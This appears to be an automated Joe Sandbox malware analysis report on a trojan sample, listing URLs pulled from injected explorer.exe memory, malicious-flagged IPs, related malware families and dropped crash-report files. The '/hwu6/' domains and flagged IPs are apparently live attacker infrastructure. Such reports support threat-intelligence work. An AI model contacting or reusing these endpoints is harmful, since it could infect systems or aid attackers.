                                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.dangdut4dselalu.pro/hwu6/www.lf758.vipexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.dental-implants-83810.bond/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.msn.com/en-us/news/crime/us-rep-henry-cuellar-of-texas-is-carjacked-by-three-armed-attacexplorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://www.vytech.net/hwu6/www.lebahsemesta57.clickexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://www.dental-implants-83810.bondReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://www.eternityzon.shop/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://www.inefity.cloudReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.maheshg.xyzexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://www.imxtld.clubReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://www.ozzd86fih4.online/hwu6/www.6vay.boatsexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://outlook.com_explorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://www.vibrantsoul.xyz/hwu6/www.dangdut4dselalu.proexplorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://www.msn.com/en-us/news/us/texas-congressman-is-victim-of-carjacking-in-washington-d-c/ar-AA1explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://www.otzen.infoReferer:explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://www.8e5lr5i9zu.buzz/hwu6/www.inefity.cloudexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://schemas.miexplorer.exe, 00000002.00000000.1667358180.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2809659599.000000000C857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2819005763.000000000C85E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://www.migraine-treatment-36101.bondexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://www.ozzd86fih4.online/hwu6/explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://www.rider.vision/hwu6/explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://www.vytech.netReferer:explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.msn.com/en-us/news/crime/explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://www.bethlark.top/hwu6/www.apoppynote.comexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.edmaker.online/hwu6/www.dental-implants-83810.bondexplorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                45.38.60.47
                                                                                                                                                                                                                                www.vytech.netUnited States
                                                                                                                                                                                                                                18779EGIHOSTINGUStrue
                                                                                                                                                                                                                                104.21.40.196
                                                                                                                                                                                                                                www.7b5846.onlineUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                198.252.111.49
                                                                                                                                                                                                                                lebahsemesta57.clickCanada
                                                                                                                                                                                                                                36351SOFTLAYERUStrue
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1579888
                                                                                                                                                                                                                                Start date and time:2024-12-23 13:56:08 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 8m 58s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:25
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:file.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.evad.winEXE@12/11@6/3
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 60
                                                                                                                                                                                                                                • Number of non-executed functions: 290
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe, TextInputHost.exe, StartMenuExperienceHost.exe, mobsync.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 131.253.33.203, 2.16.158.179, 2.16.158.170, 2.16.158.169, 2.16.158.185, 2.16.158.96, 2.16.158.171, 2.16.158.90, 2.16.158.91, 2.16.158.176, 20.12.23.50, 13.107.246.63, 20.190.147.12, 23.218.208.109, 2.16.158.33
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, a-0003.dc-msedge.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, icePrime.a-0003.dc-msedge.net, r.bing.com, api-msn-com.a-0003.a-msedge.net
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • VT rate limit hit for: file.exe
                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                07:57:00API Interceptor920415x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                                07:57:40API Interceptor1872836x Sleep call for process: wlanext.exe modified
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                104.21.40.196file.exeGet hashmaliciousManusCryptBrowse
                                                                                                                                                                                                                                  fJe9em23BB.exeGet hashmaliciousFabookie, ManusCrypt, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLineBrowse
                                                                                                                                                                                                                                    BLAoQPacf8.exeGet hashmaliciousClipboard Hijacker, ManusCrypt, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLineBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousManusCryptBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousDjvu, Fabookie, ManusCrypt, SmokeLoaderBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousDjvu, Fabookie, ManusCrypt, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousDjvu, Fabookie, SmokeLoaderBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousDjvu, Fabookie, ManusCrypt, SmokeLoaderBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousDjvu, ManusCrypt, PrivateLoader, SmokeLoader, SocelarsBrowse
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    EGIHOSTINGUSnshmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 107.164.204.39
                                                                                                                                                                                                                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 107.164.205.148
                                                                                                                                                                                                                                                    la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 142.253.14.168
                                                                                                                                                                                                                                                    hmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 23.27.237.204
                                                                                                                                                                                                                                                    arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                    • 142.253.14.140
                                                                                                                                                                                                                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 107.186.122.115
                                                                                                                                                                                                                                                    loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 205.166.25.210
                                                                                                                                                                                                                                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 23.27.206.168
                                                                                                                                                                                                                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 104.253.182.82
                                                                                                                                                                                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.120.223.194
                                                                                                                                                                                                                                                    SOFTLAYERUSarmv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 74.55.127.17
                                                                                                                                                                                                                                                    armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.81.196.88
                                                                                                                                                                                                                                                    loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 169.49.98.24
                                                                                                                                                                                                                                                    nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 161.158.243.33
                                                                                                                                                                                                                                                    spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                    • 161.203.103.182
                                                                                                                                                                                                                                                    nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 207.218.215.172
                                                                                                                                                                                                                                                    nshmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 169.62.101.145
                                                                                                                                                                                                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 169.48.138.43
                                                                                                                                                                                                                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 158.85.204.111
                                                                                                                                                                                                                                                    arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 169.53.22.157
                                                                                                                                                                                                                                                    CLOUDFLARENETUShttps://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.18.16.155
                                                                                                                                                                                                                                                    https://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.22.164
                                                                                                                                                                                                                                                    Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                    acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.21.35.89
                                                                                                                                                                                                                                                    rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                                                                                                    https://www.google.com.au/url?q=//www.google.co.nz/amp/s/synthchromal.ru/Vc51/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.154.63
                                                                                                                                                                                                                                                    https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.92.223
                                                                                                                                                                                                                                                    FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.150.173
                                                                                                                                                                                                                                                    armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 1.8.230.191
                                                                                                                                                                                                                                                    BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.150.173
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                                    Entropy (8bit):2.2887650031916205
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:1BC1Lsxe0jAWMnvKIRvKnASzuiFNY4lO8k:1B8sxe0j0niavYASzuiFNY4lO8
                                                                                                                                                                                                                                                    MD5:1A6CA009C597CAE833FB61FEC4929E55
                                                                                                                                                                                                                                                    SHA1:3F94C1178FCA0749C255737840339AFE00D817DE
                                                                                                                                                                                                                                                    SHA-256:5615692E2D5E655E5B3B1C8E43B04D2328F24F4B66351A45EF9B62C0F0B8D6E0
                                                                                                                                                                                                                                                    SHA-512:EC5D6A8A08E421B5D4ABCC1C54AD9B4A34355DFF2930D7209577DBBD52EFC89825857AE94A9B8B988D9FEDC777A36DD6CCAC345672EC787E4707DE203BB9014A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.3.2.3.1.8.9.9.9.1.2.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.0.8.0.f.2.5.-.a.8.5.5.-.4.b.8.0.-.9.b.7.b.-.8.4.9.5.a.f.6.2.d.5.a.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.1.4.1.f.3.1.-.a.a.a.b.-.4.7.9.2.-.8.1.0.b.-.3.6.f.6.9.c.e.1.1.f.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.4.-.0.0.0.1.-.0.0.1.4.-.d.9.c.f.-.1.9.4.b.3.1.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 17 streams, Mon Dec 23 12:58:39 2024, 0x1205a4 type
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1020712
                                                                                                                                                                                                                                                    Entropy (8bit):1.3745202200022035
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:7Z9jnXAsfXsEUStY0ZX8t+HfBYY516P0y69z1iUrtn0G777kLww:N9jXAsPsEUStYgXtHfBYepy6drh0Ew
                                                                                                                                                                                                                                                    MD5:70389A43492376F9DB9CEFB29E424DE4
                                                                                                                                                                                                                                                    SHA1:825931D1A8C3E772D1624015DD3846A06A970431
                                                                                                                                                                                                                                                    SHA-256:8F2D9AD486D4673B55F6C884909F272B8594D449EA8BFBF27F87B3D72282549E
                                                                                                                                                                                                                                                    SHA-512:989478F6F2853514F9FA99C0F472C9762179A9B19D0D06C7F66C785D1326EC6BED3BF4E1F301EFD275F50C7888804F5644194EC2259ABAB77A0F93404CCE8935
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:MDMP..a..... ........^ig............$... .......pl..P..............................................x.......8...........T...$.......hQ...A..................................$...............................................................................eJ......@.......Lw......................T...........=Oig............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10858
                                                                                                                                                                                                                                                    Entropy (8bit):3.702949030517078
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJdAxmX6YXfIgmfqzV0asprQ89bmKvZVfYbCm:R6lXJagX6YPIgmfqzVimSZVf4
                                                                                                                                                                                                                                                    MD5:B7BCBB78A69EB940B609EC8CE517D890
                                                                                                                                                                                                                                                    SHA1:6C2DAB85B5BB571F53B5B56866E1C9A98E00B8E2
                                                                                                                                                                                                                                                    SHA-256:641A7152F85FA4CA6F3AB172C8DFBAAB4D5DBB13F90B84398BE083298A1855A1
                                                                                                                                                                                                                                                    SHA-512:1E26D1EF1D080DEFFFF6E7D91D98BA45FCC7A11F0CA68D8DAAD0E417D42AD2B2F921A63DA08CC788D794A75ABEC462EE8187D09944D3550B45AD76627AB39ECF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.0.<./.P.i.
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4724
                                                                                                                                                                                                                                                    Entropy (8bit):4.463507363479176
                                                                                                                                                                                                                                                    Encrypted:false
